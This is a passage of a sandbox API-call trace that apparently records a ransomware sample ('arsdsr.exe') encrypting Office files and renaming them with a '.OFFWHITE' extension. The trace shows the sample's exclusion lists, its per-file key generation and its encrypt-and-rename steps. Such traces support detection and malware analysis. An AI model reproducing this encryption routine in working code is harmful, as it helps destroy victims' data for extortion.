returned=".trx_dll" [0144.561] lstrcmpiW (lpString1=".trx_dll", lpString2=".exe") returned 1 [0144.561] lstrcmpiW (lpString1=".trx_dll", lpString2=".log") returned 1 [0144.561] lstrcmpiW (lpString1=".trx_dll", lpString2=".cab") returned 1 [0144.561] lstrcmpiW (lpString1=".trx_dll", lpString2=".cmd") returned 1 [0144.561] lstrcmpiW (lpString1=".trx_dll", lpString2=".com") returned 1 [0144.562] lstrcmpiW (lpString1=".trx_dll", lpString2=".cpl") returned 1 [0144.562] lstrcmpiW (lpString1=".trx_dll", lpString2=".ini") returned 1 [0144.562] lstrcmpiW (lpString1=".trx_dll", lpString2=".dll") returned 1 [0144.562] lstrcmpiW (lpString1=".trx_dll", lpString2=".url") returned -1 [0144.562] lstrcmpiW (lpString1=".trx_dll", lpString2=".ttf") returned -1 [0144.562] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp3") returned 1 [0144.562] lstrcmpiW (lpString1=".trx_dll", lpString2=".pif") returned 1 [0144.562] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp4") returned 1 [0144.562] lstrcmpiW (lpString1=".trx_dll", lpString2=".OFFWHITE") returned 1 [0144.562] lstrcmpiW (lpString1=".trx_dll", lpString2=".msi") returned 1 [0144.562] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0144.562] GetProcessHeap () returned 0x500000 [0144.562] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52ea50 [0144.562] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MOR6INT.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\mor6int.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0144.564] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=49504) returned 1 [0144.564] GetProcessHeap () returned 0x500000 [0144.564] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5469f8 [0144.564] GetProcessHeap () returned 0x500000 [0144.565] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546a10 [0144.565] GetProcessHeap () returned 0x500000 [0144.565] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fc80 [0144.565] GetProcessHeap () returned 0x500000 [0144.565] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fd88 [0144.565] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.565] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.565] SystemFunction036 (in: RandomBuffer=0x5469f8, RandomBufferLength=0x10 | out: RandomBuffer=0x5469f8) returned 1 [0144.565] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.565] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.565] SystemFunction036 (in: RandomBuffer=0x546a10, RandomBufferLength=0x10 | out: RandomBuffer=0x546a10) returned 1 [0144.565] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.565] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.565] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fc80*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55fc80*, pdwDataLen=0x295cf90*=0x100) returned 1 [0144.566] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.566] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.566] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fd88*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55fd88*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0144.566] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0xc160, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.566] SetLastError (dwErrCode=0x0) [0144.566] WriteFile (in: hFile=0x218, lpBuffer=0x55fc80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fc80*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0144.570] GetLastError () returned 0x0 [0144.570] GetLastError () returned 0x0 [0144.570] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0xc260, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.570] WriteFile (in: hFile=0x218, lpBuffer=0x55fd88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fd88*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0144.570] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0xc360, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.570] WriteFile (in: hFile=0x218, lpBuffer=0x52ea50*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x52ea50*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0144.570] GetProcessHeap () returned 0x500000 [0144.570] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0xc160) returned 0x5607c8 [0144.570] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.570] ReadFile (in: hFile=0x218, lpBuffer=0x5607c8, nNumberOfBytesToRead=0xc160, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesRead=0x295d1c0*=0xc160, lpOverlapped=0x0) returned 1 [0144.575] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.576] WriteFile (in: hFile=0x218, lpBuffer=0x5607c8*, nNumberOfBytesToWrite=0xc160, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesWritten=0x295d1cc*=0xc160, lpOverlapped=0x0) returned 1 [0144.576] GetProcessHeap () returned 0x500000 [0144.576] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5607c8 | out: hHeap=0x500000) returned 1 [0144.576] CloseHandle (hObject=0x218) returned 1 [0144.576] GetProcessHeap () returned 0x500000 [0144.576] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fc80 | out: hHeap=0x500000) returned 1 [0144.576] GetProcessHeap () returned 0x500000 [0144.576] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fd88 | out: hHeap=0x500000) returned 1 [0144.576] GetProcessHeap () returned 0x500000 [0144.576] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5469f8 | out: hHeap=0x500000) returned 1 [0144.576] GetProcessHeap () returned 0x500000 [0144.576] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546a10 | out: hHeap=0x500000) returned 1 [0144.576] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MOR6INT.REST.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MOR6INT.REST.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MOR6INT.REST.trx_dll" [0144.576] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MOR6INT.REST.trx_dll", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MOR6INT.REST.trx_dll.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MOR6INT.REST.trx_dll.OFFWHITE" [0144.577] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MOR6INT.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\mor6int.rest.trx_dll"), lpNewFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MOR6INT.REST.trx_dll.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\mor6int.rest.trx_dll.offwhite")) returned 1 [0144.577] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9f53ca00, ftCreationTime.dwHighDateTime=0x1caca0b, ftLastAccessTime.dwLowDateTime=0xeee42ef0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x9f53ca00, ftLastWriteTime.dwHighDateTime=0x1caca0b, nFileSizeHigh=0x0, nFileSizeLow=0x17960, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="MSOINTL.DLL.trx_dll", cAlternateFileName="MSOINT~1.TRX")) returned 1 [0144.577] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2=".") returned 1 [0144.577] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2="..") returned 1 [0144.577] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2="...") returned 1 [0144.578] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2="windows") returned -1 [0144.578] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2="$recycle.bin") returned 1 [0144.578] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2="rsa") returned -1 [0144.578] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2="ntuser.dat") returned -1 [0144.578] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2="programdata") returned -1 [0144.578] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2="appdata") returned 1 [0144.578] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2="program files") returned -1 [0144.578] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2="program files (x86)") returned -1 [0144.578] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\" [0144.578] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpString2="MSOINTL.DLL.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.DLL.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.DLL.trx_dll" [0144.578] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.578] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.578] PathFindExtensionW (pszPath="MSOINTL.DLL.trx_dll") returned=".trx_dll" [0144.578] lstrcmpiW (lpString1=".trx_dll", lpString2=".exe") returned 1 [0144.578] lstrcmpiW (lpString1=".trx_dll", lpString2=".log") returned 1 [0144.578] lstrcmpiW (lpString1=".trx_dll", lpString2=".cab") returned 1 [0144.578] lstrcmpiW (lpString1=".trx_dll", lpString2=".cmd") returned 1 [0144.578] lstrcmpiW (lpString1=".trx_dll", lpString2=".com") returned 1 [0144.578] lstrcmpiW (lpString1=".trx_dll", lpString2=".cpl") returned 1 [0144.578] lstrcmpiW (lpString1=".trx_dll", lpString2=".ini") returned 1 [0144.578] lstrcmpiW (lpString1=".trx_dll", lpString2=".dll") returned 1 [0144.578] lstrcmpiW (lpString1=".trx_dll", lpString2=".url") returned -1 [0144.578] lstrcmpiW (lpString1=".trx_dll", lpString2=".ttf") returned -1 [0144.578] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp3") returned 1 [0144.578] lstrcmpiW (lpString1=".trx_dll", lpString2=".pif") returned 1 [0144.579] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp4") returned 1 [0144.579] lstrcmpiW (lpString1=".trx_dll", lpString2=".OFFWHITE") returned 1 [0144.579] lstrcmpiW (lpString1=".trx_dll", lpString2=".msi") returned 1 [0144.579] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0144.579] GetProcessHeap () returned 0x500000 [0144.579] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52ea60 [0144.579] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\msointl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0144.580] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=96608) returned 1 [0144.580] GetProcessHeap () returned 0x500000 [0144.580] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546a10 [0144.580] GetProcessHeap () returned 0x500000 [0144.580] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5469f8 [0144.580] GetProcessHeap () returned 0x500000 [0144.580] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fd88 [0144.580] GetProcessHeap () returned 0x500000 [0144.580] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fc80 [0144.580] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.580] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.580] SystemFunction036 (in: RandomBuffer=0x546a10, RandomBufferLength=0x10 | out: RandomBuffer=0x546a10) returned 1 [0144.580] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.580] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.580] SystemFunction036 (in: RandomBuffer=0x5469f8, RandomBufferLength=0x10 | out: RandomBuffer=0x5469f8) returned 1 [0144.580] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.580] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.581] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fd88*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55fd88*, pdwDataLen=0x295cf90*=0x100) returned 1 [0144.581] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.581] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.581] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fc80*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55fc80*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0144.581] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x17960, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.581] SetLastError (dwErrCode=0x0) [0144.581] WriteFile (in: hFile=0x218, lpBuffer=0x55fd88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fd88*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0144.583] GetLastError () returned 0x0 [0144.583] GetLastError () returned 0x0 [0144.583] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x17a60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.583] WriteFile (in: hFile=0x218, lpBuffer=0x55fc80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fc80*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0144.584] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x17b60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.584] WriteFile (in: hFile=0x218, lpBuffer=0x52ea60*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x52ea60*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0144.584] GetProcessHeap () returned 0x500000 [0144.584] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x17960) returned 0x5607c8 [0144.584] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.584] ReadFile (in: hFile=0x218, lpBuffer=0x5607c8, nNumberOfBytesToRead=0x17960, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesRead=0x295d1c0*=0x17960, lpOverlapped=0x0) returned 1 [0144.591] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.591] WriteFile (in: hFile=0x218, lpBuffer=0x5607c8*, nNumberOfBytesToWrite=0x17960, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesWritten=0x295d1cc*=0x17960, lpOverlapped=0x0) returned 1 [0144.591] GetProcessHeap () returned 0x500000 [0144.591] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5607c8 | out: hHeap=0x500000) returned 1 [0144.591] CloseHandle (hObject=0x218) returned 1 [0144.592] GetProcessHeap () returned 0x500000 [0144.592] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fd88 | out: hHeap=0x500000) returned 1 [0144.592] GetProcessHeap () returned 0x500000 [0144.592] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fc80 | out: hHeap=0x500000) returned 1 [0144.592] GetProcessHeap () returned 0x500000 [0144.592] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546a10 | out: hHeap=0x500000) returned 1 [0144.592] GetProcessHeap () returned 0x500000 [0144.592] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5469f8 | out: hHeap=0x500000) returned 1 [0144.592] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.DLL.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.DLL.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.DLL.trx_dll" [0144.592] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.DLL.trx_dll", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.DLL.trx_dll.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.DLL.trx_dll.OFFWHITE" [0144.592] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\msointl.dll.trx_dll"), lpNewFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.DLL.trx_dll.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\msointl.dll.trx_dll.offwhite")) returned 1 [0144.593] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9f53ca00, ftCreationTime.dwHighDateTime=0x1caca0b, ftLastAccessTime.dwLowDateTime=0xeeeb5310, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x9f53ca00, ftLastWriteTime.dwHighDateTime=0x1caca0b, nFileSizeHigh=0x0, nFileSizeLow=0x2ced60, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="MSOINTL.REST.trx_dll", cAlternateFileName="MSOINT~2.TRX")) returned 1 [0144.593] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2=".") returned 1 [0144.593] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2="..") returned 1 [0144.593] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2="...") returned 1 [0144.593] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2="windows") returned -1 [0144.593] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2="$recycle.bin") returned 1 [0144.593] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2="rsa") returned -1 [0144.593] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2="ntuser.dat") returned -1 [0144.593] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2="programdata") returned -1 [0144.593] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2="appdata") returned 1 [0144.593] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2="program files") returned -1 [0144.593] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2="program files (x86)") returned -1 [0144.593] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\" [0144.593] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpString2="MSOINTL.REST.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.REST.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.REST.trx_dll" [0144.593] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.593] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.594] PathFindExtensionW (pszPath="MSOINTL.REST.trx_dll") returned=".trx_dll" [0144.594] lstrcmpiW (lpString1=".trx_dll", lpString2=".exe") returned 1 [0144.594] lstrcmpiW (lpString1=".trx_dll", lpString2=".log") returned 1 [0144.594] lstrcmpiW (lpString1=".trx_dll", lpString2=".cab") returned 1 [0144.594] lstrcmpiW (lpString1=".trx_dll", lpString2=".cmd") returned 1 [0144.594] lstrcmpiW (lpString1=".trx_dll", lpString2=".com") returned 1 [0144.594] lstrcmpiW (lpString1=".trx_dll", lpString2=".cpl") returned 1 [0144.594] lstrcmpiW (lpString1=".trx_dll", lpString2=".ini") returned 1 [0144.594] lstrcmpiW (lpString1=".trx_dll", lpString2=".dll") returned 1 [0144.594] lstrcmpiW (lpString1=".trx_dll", lpString2=".url") returned -1 [0144.594] lstrcmpiW (lpString1=".trx_dll", lpString2=".ttf") returned -1 [0144.594] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp3") returned 1 [0144.594] lstrcmpiW (lpString1=".trx_dll", lpString2=".pif") returned 1 [0144.594] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp4") returned 1 [0144.594] lstrcmpiW (lpString1=".trx_dll", lpString2=".OFFWHITE") returned 1 [0144.594] lstrcmpiW (lpString1=".trx_dll", lpString2=".msi") returned 1 [0144.594] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0144.594] GetProcessHeap () returned 0x500000 [0144.594] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52ea70 [0144.594] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\msointl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0144.595] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=2944352) returned 1 [0144.595] GetProcessHeap () returned 0x500000 [0144.595] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5469f8 [0144.596] GetProcessHeap () returned 0x500000 [0144.596] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546a10 [0144.596] GetProcessHeap () returned 0x500000 [0144.596] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fc80 [0144.596] GetProcessHeap () returned 0x500000 [0144.596] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fd88 [0144.596] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.596] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.596] SystemFunction036 (in: RandomBuffer=0x5469f8, RandomBufferLength=0x10 | out: RandomBuffer=0x5469f8) returned 1 [0144.596] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.596] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.596] SystemFunction036 (in: RandomBuffer=0x546a10, RandomBufferLength=0x10 | out: RandomBuffer=0x546a10) returned 1 [0144.596] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.596] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.596] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fc80*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55fc80*, pdwDataLen=0x295cf90*=0x100) returned 1 [0144.596] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.596] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.596] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fd88*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55fd88*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0144.597] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x2ced60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.597] SetLastError (dwErrCode=0x0) [0144.597] WriteFile (in: hFile=0x218, lpBuffer=0x55fc80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fc80*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0144.600] GetLastError () returned 0x0 [0144.600] GetLastError () returned 0x0 [0144.600] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x2cee60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.600] WriteFile (in: hFile=0x218, lpBuffer=0x55fd88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fd88*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0144.600] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x2cef60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.600] WriteFile (in: hFile=0x218, lpBuffer=0x52ea70*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x52ea70*, lpNumberOfBytesWritten=0x295d1cc*=0x8, 